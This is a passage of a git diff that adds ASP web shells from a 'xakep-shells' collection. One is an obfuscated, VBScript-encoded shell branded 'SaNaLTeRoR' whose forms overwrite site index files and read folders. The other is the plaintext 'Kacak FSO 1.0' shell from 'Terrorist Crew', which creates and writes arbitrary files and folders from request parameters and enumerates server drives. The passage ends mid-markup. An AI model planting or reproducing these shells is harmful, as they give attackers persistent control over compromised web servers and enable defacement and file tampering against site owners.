ok,jkD+X~)Ymmm3dlUý",WUE	~XDrUbPXC"mmC3kýUý.Pö.	P=PRczc zmVrxbxdrD+/b mK:P@!C~tM+6'_W.U3@*@!6GxDP^G^WDxsb:n@*G)_b~wb\Sb,ÖIg3|,"Z@!Jl@*@!J0W	O@*@!Vk@*6VE,g,A;DCzmPG3!hl0PrdD+Nnðr	k"PGGkXC	ýx,bNý	ýPjnPI+.k	k~emyýx,@!l,tDWxgKD	+V @*@!6WUY,^W^W.x^k:n@*Gbub,oz}JzPÖ"12nR@!&l@*@!&0KxO@*@!4D@*@!mxY.@*AHP@!l~t.n6'hlbsYK)hCbV4Gh(@$4WDhmkscmK:gkE(%+1Yxk	NnaD@*tnt9k@!JC@*@!(D@*?2+^rmV~K4Cx0/~PKPCGsHfn:KU,~30WMW:mx,SP_kO4mXOCMP~GnVb0kþVE@#@&mKwz'E@!1+UY.@*@!0GUDPmGsKDxVbhPdby'*@*Ksk6Pul03ý@!8M@*@!6GxDPmKsGD{h4kO+~dbyn'y@*@!JmnUD+D@*@!^k@*A!~Um.bwDPHt9rP:l.l6ýx[C	P5m"ýVsýþYýDc@!sk@*fð+.Vr~:lVý:,)D0l[Cþ^lDýh~_WsXGnsWUvb9:k	#,SPA3GDK:CU,`sc6RqPl9hrxbP*PSPurD4CXDCDv?CUmVb.n	l~b9hbxr*PBPfVbWkþ3~`UlUC^bDUl,bNsrUk*PBPPE.C	/G0D~`:E.C	/WWOcKVPz[skUb#,~Pg+K~.PPü:,b[CsPr^Cx^lDm~P+þ30üDs+. c@!sk@*$E,?^.bwY~)kVCP@!WKxO,mKVWM'^r:@*JWTPcVmXýY*~@!J0W	O@*K!Ysl"R@!sb@*3L9nDbx~ezwYýðý~$!xCP~n	ynMPUmDbwD~KüsP$k^orsDk,JWTVEHG.P~k^orxr"R Rv$E,KCVýsNlU~UmGD^nXP9xxPdlsnD,\nPAL[nMPSmh+MkP:üh~AÝ^obVnDr~dWLV!zWMVC.*@!Vr@*Vü\nx^r,ArMPUmDbwD~Ýçk	Pjl9+^n,?K,dmMkwDsnDbxbPFEssmxhl	ý"ýPÖ	+.rMky E@#@&sk	V^+.{J@!m+	Y.@*@!0GxDP^G^WD{sks+Pkr"+{*@*fG/O~UkO+^nD@!4.@*@!0WUO,mGVK.{h4bYP/byx @*@!&mxOnM@*@!^r@*ShhcdCxmVD+.W. KDL@!^r@*ShA 6lY4nMWWh8cmGs@!^k@*ShS /mxCVmDnUmRmKh@!^k@*SAARDEMlU/GWDRO3@!sk@*hAAcYl4.b4CYc^K:@!^k@*hhSRbdVm:CtbyhnDRmKh@!^k@*SAAR4lMEUXC4Hl WML@!1+UOD@*@!WKxOP1G^W.{DNPkk.n'W@*Jbt2]~UÝK2d3IÝ@!zmUO+M@*@!4.@*@!WKxOPkry'+@*@!Vk@*ASh /m8KYCT+ Y+m:cGDTPSPShA kl\kC3cmWs~SPShSRhkUr6 xOJ@#@&GLP'~];;+kOcp;DH?YMk	L@#@&kWPKon~{PJr~Y4+x@#@&^l^V,:CkU@#@&+s/r0,WLn,'PE!Kx[+ME,Y4x@#@&mmV^~mm/nF@#@&nsk+k6~WT+P{~EW0ErPOtnU@#@&^l^sP1ldny@#@&nsk+r0,GT+~{Prtl03bUNmJ~Y4+U@#@&ml^sP1l/f@#@&Vk+r0~GT+~',E3!VsC	k:E~Dtnx@#@&1ls^P1l/c@#@&+^/nk6PGLP',EmKwXr~Otx@#@&^lss,mC/X@#@&+sdk0~GT+~',E^kU0VDJ,Y4nx@#@&^l^V~^m/++@#@&V/rWPKoPxPEGMxn3r~Y4+U@#@&mlss,mC/{@#@&n^/k0,WTnP{PEWMxnVyJPD4+	@#@&1CsV,mm/n%@#@&x[PbW@#@&/;8,:lrUS40DAA==^#~@%>
+<center>
+<br><br><br><br><br><br><br><br>
+<br><br><br><br><br><br><br><br>
+<hr color=lime width=50%>
+<SCRIPT LANGUAGE="JavaScript">
+ <!-- 
+function Start(page)
+ {
+ OpenWin = this.open(page, "CtrlWindow","toolbar=menubar=No,scrollbars=No,status=No,height=250,");
+ }
+ //-->
+</SCRIPT>
+<script language="JavaScript1.2">
+var message="SaNaLTeRoR - ÝnDexEr - Reader"
+var typingbasecolor="red"
+var typingtextcolor="lime"
+var blinkspeed=598 
+var fontface="arial,geneva,helvetica"
+var fontsize="5"
+var n=0
+if (document.all){
+document.write('<font face="'+fontface+'" size="'+fontsize+'" color="'+typingbasecolor+'">')
+for (m=0;m<message.length;m++)
+document.write('<span id="typinglight">'+message.charAt(m)+'</span>')
+document.write('</font>')
+var tempref=document.all.typinglight
+}
+else
+document.write(message)
+function typing(){
+if (n==0){
+for (m=0;m<message.length;m++)
+tempref[m].style.color=typingbasecolor
+}
+tempref[n].style.color=typingtextcolor
+if (n<tempref.length-1)
+n++
+else{
+n=0
+clearInterval(blinking)
+setTimeout("starttyping()",1500)
+return
+}
+}
+function starttyping(){
+if (document.all)
+blinking=setInterval("typing()",blinkspeed)
+}
+starttyping()
+</script> 
+<form action="?Gonder" method="post">
+<center><table>
+<td>Nerden :<td><input type="text" name="nerden" size=25 value=index.html></td>
+<td><input type="submit" onclick="submit()" value="Veriyi Gönder"></td><tr>
+<td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input type="reset" onclick="reset" value="    Temizle    "></td><tr>
+</form>
+<form action="?oku" method="post">
+<td><font color=pink>Oku :</font><td><input type="text" name="klasor" size=25 value=<%=#@~^LQAAAA==.;;/DR/D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type="submit" onclick="submit()" value="  Veriyi Oku   "></td><tr>
+</form>
+</table><br>
+<a href="javascript:void(0);" onclick="javascript:Start ('?hakkinda');">
+Script Hakkýnda </a> - <a href="javascript:void(0);" onclick="javascript:Start ('?kullanim');">Kullaným Bilgileri </a>- <a href="javascript:void(0);" onclick="javascript:Start ('?copy');">Copright</a> -<a href="javascript:void(0);" onclick="javascript:Start ('?linkler');"> Linkler</a>
+<br><br><br>
+<hr color=lime width=50%>
+<%#@~^VA4AAA==n	N~kE(@#@&EO RO ORO ORR OO RO O@#@&d;4,mm/nF@#@&Kx~+M.WMP.nkE:n~	+aY@#@&	+.9+	P',D5E/OR6W.hvJx.NxJ*@#@&xDXnPx~M+5EdYc0G.s`JUnM+z+rb@#@&jY,EYbVk~',?nD7+. ;D+mO+}4L^O`rHU/RPGKVdJ*@#@&b0~nMDP@!@*,!~Y4n	P@#@&D/wKxknRSDrYPE@!1+xDnD@*Cb:)~),JL+.D [/^Db2YbWU'r@!z^n	YnD@*E@#@&n^/@#@&M+k2W	/nRSDrOPJÝþ^n:bxk.~$lþmDý^ýJ@#@&nU9Pr0@#@&EDksdcnDG^/dsK.sPUDX+BP	nD9+U@#@&DndaWxknRSDkDn~J@!mxO+.@*@!4.@*@!WWM:~C1YkGU{g~:O4W[{wK/Y@*@!bUw!Y~YHwnxkE4srY,\l^;n'rJz1)Pj)Is)Jr~/bynxWc@*@!&6W.:@*E@#@&@#@&+	NPkE(@#@&EORO ORR OO RO OO RRO@#@&kE8P^Ck++@#@&Gx,+..KDP.nkEh+,U6O@#@&0VlkWM~',Dn;!+dOc0WMh`r3VmdGDr#@#@&j+O~K4%C:Pn,'~jD\n.cZ.+mOr8N+1Y`rHb^DK/G0DRp\dCK:KJ*@#@&bW~P	WDPnD.~{PTPD4+	P@#@&M+/2G	/nRS.bYn,J@!m+	Y.@*_bPb,)~EL+DM N/mMr2YbW	[E@!^n	YnD@*E@#@&+U[,k0@#@&K4%C:PhR6a+	PJV2:E~,JE[0VCdKD[rE~,0l^dn@#@&W(LuKPKc?nx9@#@&0W[smDPx~k+.\.ctOsVAxmKNcW(LuK:n ]/wKU/K+XOb@#@&D/2WUdRADbO+,J@!WKxY~^KVGD{A4kOPkky'l@*@!1+UYD@*~ P.A]ÝSAIP ~@!4M@*@!mnxOnM@*@!YaYmDnC,/Yzs'vhb[DtlO!uitkT4Y=&X!pB@*EL3W9slM[J@!&O+XYmDnl@*E@#@&.+k2W	/n SDkOn,J@!4M@*@!0GM:,lmDkKU'QPh+DtG[{wWkO@*@!kxa;OPDXa+x/;8skOP7CV!+xErb1)~UbeszErPdby'cW@*@!&0KDh@*r@#@&n	NPk;4@#@&B RRO O ORORR ORO RO @#@&d!4P^Ck+f@#@&./2Kxk+RSDbO+,JE[1\W'rJ@#@&.+kwW	dnRSDbYnPEELY;/LEJ@#@&nU9P/;8@#@&vO R OR O OO O RO ORO @#@&d!4P1C/c@#@&.n/aW	/nRA.bYnPrE[0Essmxkh'rJ@#@&MnkwG	/RhMkDnPrJ'Y!/'Er@#@&UN,/E(@#@&B O ORORR ORO RO ORR O@#@&d!4~mmd*@#@&D/wKxknRSDrYPEELmWaz[rJ@#@&.n/aW	/nRA.bYnPrE[DEd'rJ@#@&n	N~/!8@#@&v O OO O RO ORO ORR OO@#@&/!4P1Cd++@#@&Dn/2G	/nRS.kD+~Er[SrU0VnDLEr@#@&M+kwW	/ hMkO+,JE'DE/LEJ@#@&+	[~/!4@#@&vORR ORO RO ORR OORR O@#@&k;(P^m/G@#@&DdwKxd+ch.rD+Pr@!Vb@*ÝV0~ÖUmPnE.4CUý	PjkDn/bxn~zY:CV,kçrx,8bD~bx9+6,tm"ýD^lzýxc@!sr@*?Yc~k	N+Xn.Pmx9P.+C[D~?1.kaYrUbxPeC	ýxCPIüV^+zbxc@!Vb@*UGxMl~k	Nna,Alkýsl1l3,drYX^+~lzUý,/nD7nD9lU~kkYn~mVýUPJ~wDnVDPbçk	~h4dls4C~bN+ms@!^k@*Grz+^ksP)NChý	PjkDn/bPW.+tGdDFfRSn(/Cs4mRmK:Jhl4:;Y,/r"9+PSn4kl:(C[l	P6Dn+4GkYq&cA+(/Ch(lR^Gszhl4d!x~9kH+4bD,z+MPCV9ýðýxý"ý~7lDkCXmVý:@!sr@*UY,kUNnaD~l	[PM+C[DPd^Mk2YbUbPWM+tWkY8fRS+8/m:8CcmWs&:mt/!U&k	N6nD Ckw~ob8k,XüVsNkUr.R@!Vb@*_l"ýMVmNýðýxý.PbUN6rNPCz	ýPX.+,lYDýUý"R@!Vb@*Þr:[r,MnV9rPnE.8mxl~r	Nn6b~mYhmXmP/DPbUN6nD,lU[,D+m[+MP/1.rwDk	NnP@!WKxOP1GVKDx2bx3@*HD[+	@!J0G	Y@*PXmymUPH+.+,lOC1lðý:ý.~k	N+Xrhk.k	PCNýUý~Hl"ýXK.E.Rcr	N+a 4YhV,Lb4r*@!^k@*@!0KUY,mGVKDx2bx3@*H+M+X@!&0KxD@*~|ýdhý	l~Ý/~b9lhýU,+8~nlslkö.ü,4r.NxP(k.r:,3slköD[n	P4b~l^YP9r"k	NPGV[;ð!Prçk	~RczhC4:EO&bx[+X 4Yh,XmyýXKD!"P(E.Nm3r~bxNaR4Y:,C[lsýx,/rYndbx[+0rPbx[nXB+~LöM+~NðrþbD~s+k+VmP9n0mEsYcld2,0k^Cx9lPKsC4bVbD @!sr@*.nDbzk,MöU[DPP;þ!xCP~CkYýðýhý.NmPb9ls~Ýx9+ak,XnhbþPr^;XKDR@!sr@*~E,kþs+h[P@!0KUY,mGsKD'2r	3@*r0;@!zWKxD@*P0ý/sý~AKþPFl^l^C0R@!^r@*zDYý0~ul^l,bUVChmNýz/mUýy,)~hmkV8Gs4@$tKOslr^R1W:,~,4W^X[+sWU@$4WYsCk^RmKh~~,hSh /CUmVO+MGDcW.L,/kOnsk"NU,\n,/bY+,l9hk	P&PsW[smDýx9Cx,XlM[ýhPmVm4rVr.kkUk. Pr@#@&./wGUk+ hMrD+~rJLYEk[rE@#@&+UN,/;8@#@&B RO OO RRO O ORORR OR@#@&dE(P^Ck+%@#@&M+dwKUk+ SDbY+,J@!8D@*@!8D@*@!^n	Y+M@*A!P/1.rwDPt+4Nr~:l.l6ýUNmx~jcKP)[ý	l~5m"ý^:ýþOýMR@!4D@*ÜmMnY^k~.PÜ^.Y/b"Pz/w,uG/DVmDýUPPühü	NnPÇmsýþýDcR@!8M@*b[./~?mOýMýPFýk:ý	lPnW9;x!P!öDü	Yüsns+3,ÝdYNkðbUry,fK/zlUýU,b[ýxý,zl.ýx  @!4D@*P6OlMnmP$ö^ü:ü,2ð+MP~Gþ/mPulDl~#mDPGn:3Yb. @!(D@*|;D8C	ýx~fKdXmVC.ý	ýPMö.üUDüVnX8bVh3,Ýçkx,bHUýPU+.\D[n,rVsCxý.PSm"ýhP_N9Pol.VYh+. R,@!8.@*bN.nkPFý/sýUmPPm:,.+Mk,!kMkskMPcö.	)P9l-S+4'Csk1l	-[+WC!VORmdw@!4.@*@!Vk@*HVnD,emwC(k^kDb:@!8D@*?rYNnVbPk	^V!N+^n.k,Ym3rw~n9+.+0~b9:rU,nlUn^kU+,i^lþhm@!(D@*zNsrx,ÞkWD/rUbPÇl^hl@!4D@*jn/kkKx~.n~;WG3bnPG+ðn.^+Dr~ÇmVCDmV,SGTk	Pr^:m@!4M@*jkD+snMkx,#+MkP:C8l	VmDýUýPÝU[bDh+,-/cR E@#@&DndaWU/ SDrD+,JJLY!d[rJ@#@&x[~kE4@#@&B OO RRO O ORORR ORO R@#@&WVIEAA==^#~@%>
+</table>
+<%#@~^CQAAAA==d!4~kYHV+mwMAAA==^#~@%>
+<style>body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}.k1{font-family:Wingdings; font-size:15px;}.k2{font-family:Webdings; font-size:15px;}td{font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;}a{color:#EEEEEE;text-decoration:none;}a:hover{color:#40a0ec;}a:visited{color:#EEEEEE;}a:visited:hover{color:#40a0ec;}input,.kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}textarea{background:#121212;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #121212; border-right:1px solid #5d5d5d; border-bottom:1px solid #5d5d5d; border-top:1px solid #121212;}</style>
+<%#@~^BwAAAA==n	N~kE(oQIAAA==^#~@%>
diff --git a/xakep-shells/ASP/kacak.asp.txt b/xakep-shells/ASP/kacak.asp.txt
new file mode 100644
index 0000000..a3864c2
--- /dev/null
+++ b/xakep-shells/ASP/kacak.asp.txt
@@ -0,0 +1,899 @@
+<html>
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>Kacak FSO 1.0 | Terrorist Crew - Saldiri.Org</title>
+</head>
+
+<body topmargin="0" leftmargin="0" bgcolor="#EAEAEA">
+
+<script language="JavaScript">
+<!--
+function MM_openBrWindow(theURL,winName,features) { //v2.0
+  window.open(theURL,winName,features);
+}
+//-->
+</script>
+
+<%
+if request.querystring("TGH") = "1" then
+on error resume next
+es=request.querystring("Kacak")
+diez=server.urlencode(left(es,(instrRev(es,"\"))-1))
+
+Select case es
+case "C:" diez="C:"
+case "D:" diez="D:"
+end select
+
+
+
+
+%>
+
+
+
+
+
+<body topmargin="0" leftmargin="0"
+onLoad="location.href='?klas=<%=diez%>&usak=1'">
+
+<%
+else
+%>
+
+
+
+<%
+if request.querystring("Dosyakaydet") <> "" then
+set kaydospos=createobject("scripting.filesystemobject")
+set	kaydoses=kaydospos.createtextfile(request.querystring("dosyakaydet") & request("dosadi"))
+set kaydoses=nothing
+set kaydospos=nothing
+set kaydospos=createobject("scripting.filesystemobject")
+set kaydoses=kaydospos.opentextfile(request.querystring("dosyakaydet") & request("dosadi"), 2, true)
+kaydoses.write request("duzenx")
+set kaydoses=nothing
+set kaydospos=nothing
+end if
+%>
+
+
+
+
+
+<%
+if request.querystring("yenidosya") <> "" then
+%>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://img509.imageshack.us/img509/2842/spartaqt5.jpg"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    Kacak ©<br>
+    </span>Terrorist Crew<br>
+    <span style="font-weight: 700">
+    <br>
+    KACAK FSO 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="www.kacaq.blogspot.com" style="text-decoration: none">
+    <font color="#858585">GrayHatz ~ TurkGuvenligi.Ýnfo</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:BuqX@hotmail.com" style="text-decoration: none">
+    <font color="#858585">BuqX</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:BuqX@hotmail.com" style="text-decoration: none"><font color="#858585">@GrayHatz ~ TurkGuvenligi.Ýnfo</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan Klasör</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=response.write(request.querystring("yenidosya"))%></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#B7B7B7">
+    <form method="POST" action="?dosyakaydet=<%=request.querystring("yenidosya")%>&klas=<%=request.querystring("yenidosya")%>" name="kaypos">
+<p align="center"><b><font size="1" face="Verdana">
+<br>
+Dosya Adý : <br>
+                </font>
+	</b><font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="97" maxlength="32"
+                name="dosadi" value="Dosya Adý"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanýcý'"
+                onfocus="if (this.value == 'Kullanýcý') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"><br>
+<br>
+                </font>
+	<b><font size="1" face="Verdana">
+Ýçerik :&nbsp; <br>
+                </font>
+	<font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="95" wrap="OFF"><%=sedx%></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Oluþtur"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></p>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber19">
+  <tr>
+    <td width="100%" align="right" bgcolor="#000000">
+    <p align="center">
+	&nbsp;</td>
+  </tr>
+</table>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#EAEAEA">
+    <p align="right">
+	&nbsp;</td>
+  </tr>
+</table>
+
+
+
+<%
+else
+%>
+
+
+
+
+
+
+
+<%
+if request.querystring("klasorac") <> "" then
+
+set doses=createobject("scripting.filesystemobject")
+set es=doses.createfolder(request.querystring("aktifklas") & request("duzenx"))
+set es=nothing
+set doses=nothing
+
+
+end if
+%>
+
+<%
+if request.querystring("klasac") <> "" then
+
+set aktifklas=request.querystring("aktifklas")
+
+
+%>
+    <td width="65" bgcolor="#000000" height="76">
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber25" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://img509.imageshack.us/img509/2842/spartaqt5.jpg"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    <center>Kacak ©<br>
+    </span>Terrorist Crew<br>
+    <span style="font-weight: 700">
+    <br>
+    KACAK FSO 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="www.kacaq.blogspot.com" style="text-decoration: none">
+    <font color="#858585">GrayHatz ~ TurkGuvenligi.Ýnfo</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:BuqX@hotmail.com" style="text-decoration: none">
+    <font color="#858585">BuqX</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:BuqX@hootmail.com" style="text-decoration: none"><font color="#858585">@Hotmail.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+
+
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan Alan</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=aktifklas%></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="174">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#C5C5C5" height="134">
+    <form method="POST" action="?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>" name="klaspos">
+<p align="center"><font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="37" maxlength="32"
+                name="duzenx" value="Klasör Adý"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanýcý'"
+                onfocus="if (this.value == 'Kullanýcý') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center">&nbsp;&nbsp;
+<br>
+<br>
+<br>
+                </font>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Oluþtur"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+
+
+<%
+else
+%>
+
+
+
+<%
+if request.querystring("suruculer") <> "" then
+%>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://img509.imageshack.us/img509/2842/spartaqt5.jpg"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    Kacak ©<br>
+    </span>Terrorist Crew<br>
+    <span style="font-weight: 700">
+    <br>
+    KACAK FSO 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="www.kacaq.blogspot.com" style="text-decoration: none">
+    <font color="#858585">www.kacaq.blogspot.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:BuqX@hotmail.com" style="text-decoration: none">
+    <font color="#858585">BuqX</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:BuqX@hootmail.com" style="text-decoration: none"><font color="#858585">@Hotmail.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="4">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="4">
+        <span style="font-size: 2pt">&nbsp;</span></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="153">
+  <tr>
+    <td width="100%" height="19" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" height="113" bgcolor="#E1E1E1">&nbsp;<div align="center">
+      <center>
+      <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber2" height="17">
+        <tr>
+          <td width="208" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Sürücü Adý</font></td>
+          <td width="75" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Boyutu</font></td>
+          <td width="75" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Boþ Alan</font></td>
+          <td width="64" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Durum</font></td>
+          <td width="62" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Ýþlem</font></td>
+        </tr>
+      </table>
+      </center>
+    </div>
+    <div align="center">
+      <center>
+
+
+	<%
+	set klassis =server.createobject("scripting.filesystemobject")
+	set klasdri=klassis.drives
+	%>
+	
+	<%
+	for each dongu in klasdri
+	%>
+			
+	<%
+	if dongu.driveletter <> "A" then
+	if dongu.isready=true then
+	%>
+
+	<%
+	select case dongu.drivetype
+	case 0 teype="Diðer"
+	case 1 teype="Taþýnýr"
+	case 2 teype="HDD"
+	case 3 teype="NetWork"
+	case 4 teype="CD-Rom"
+	case 5 teype="FlashMem"
+	end select
+	%>
+      <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber3" height="17">
+        <tr>
+          <td width="208" height="17" align="left" bgcolor="#EEEEEE">
+          <font face="Verdana" style="font-size: 8pt">&nbsp;<%=dongu.driveletter%>:\ ( <%=dongu.filesystem%> )</font></td>
+          <td width="75" height="17" align="center" bgcolor="#E0E0E0">
+          <font face="Verdana" style="font-size: 8pt"><%=Round(dongu.totalsize/(1024*1024),1)%> MB</font></td>
